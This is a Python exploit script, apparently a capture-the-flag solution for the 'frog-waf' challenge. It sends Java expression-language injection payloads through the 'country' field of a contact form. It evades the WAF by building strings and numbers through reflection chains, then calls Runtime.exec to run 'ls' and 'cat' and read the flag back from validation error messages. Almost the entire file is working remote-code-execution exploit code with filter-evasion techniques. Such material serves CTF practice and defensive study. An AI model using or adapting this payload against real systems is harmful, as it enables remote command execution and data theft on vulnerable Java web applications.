/
solve.py
99 lines (73 loc) 路 3.16 KB
/
solve.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
import requests
base_url = "http://frog-waf.chals.sekai.team/addContact"
index_forName = 3
index_getRuntime = 6
index_ScannerConstr_string = 1
str_map = {}
def gen_number(num):
if num == 0:
return "[].hashCode() mod [].hashCode()"
if num == 1:
return "[].hashCode() div [].hashCode()"
return gen_string_int("p" * num) + ".length()"
def gen_string_int(str):
v = "[].getClass().getPackage().toString()"
if len(str) == 1:
return f"{v}.substring({gen_number(0)}, {gen_number(1)})"
return f"{v}.substring({gen_number(0)}, {gen_number(1)}).concat({gen_string_int(str[1:])})"
def gen_string(str):
need = str[0]
for k, v in str_map.items():
if need in k:
if len(str) == 1:
return f"{v}.substring({gen_number(k.index(need))}, {gen_number(k.index(need) + 1)})"
return f"{v}.substring({gen_number(k.index(need))}, {gen_number(k.index(need) + 1)}).concat({gen_string(str[1:])})"
elif need in k.upper():
k = k.upper()
if len(str) == 1:
return f"{v}.substring({gen_number(k.index(need))}, {gen_number(k.index(need) + 1)}).toUpperCase()"
return f"{v}.substring({gen_number(k.index(need))}, {gen_number(k.index(need) + 1)}).toUpperCase().concat({gen_string(str[1:])})"
else:
raise Exception(f"{need} not found")
def get_runtime(cmd):
runtime_exe = (
f"[].getClass().getClass().getDeclaredMethods()[{gen_number(index_forName)}]"
)
runtime_exe += f".invoke([].getClass().getClass(), {gen_string('java.lang.Runtime')}).getMethods()[{gen_number(index_getRuntime)}]"
runtime_exe += ".invoke("
runtime_exe += (
f"[].getClass().getClass().getDeclaredMethods()[{gen_number(index_forName)}]"
)
runtime_exe += (
f".invoke([].getClass().getClass(), {gen_string('java.lang.Runtime')})"
)
runtime_exe += ")"
runtime_exe += f".exec({cmd}).getInputStream()"
return runtime_exe
def gen_payload():
scanner_constr = (
f"[].getClass().getClass().getDeclaredMethods()[{gen_number(index_forName)}]"
)
scanner_constr += f".invoke([].getClass().getClass(), {gen_string('java.util.Scanner')}).getDeclaredConstructors()[{gen_number(index_ScannerConstr_string)}]"
runtime_exe = get_runtime(gen_string("ls"))
payload = f"{scanner_constr}.newInstance({runtime_exe}).useDelimiter({gen_string('AAA')}).next().substring({gen_number(17)}, {gen_number(58)})" # offset for flag name
runtime_exe = get_runtime(f"{gen_string('cat ')}.concat({payload})")
payload = f"{scanner_constr}.newInstance({runtime_exe}).useDelimiter({gen_string('AAA')}).next()"
return payload
def send(payload):
payload = "${" + payload + "}"
j = requests.post(
base_url,
json={
"country": payload,
"firstName": "Aaa",
"lastName": "Aaa",
"description": "Aaa",
},
).json()
return j["violations"][0]["message"].replace(" is not a valid country", "").strip()
for i in range(0, 10):
v = f"[].getClass().getDeclaredMethods()[{gen_number(i)}].toString()"
k = send(v)
str_map[k] = v
print(send(gen_payload()))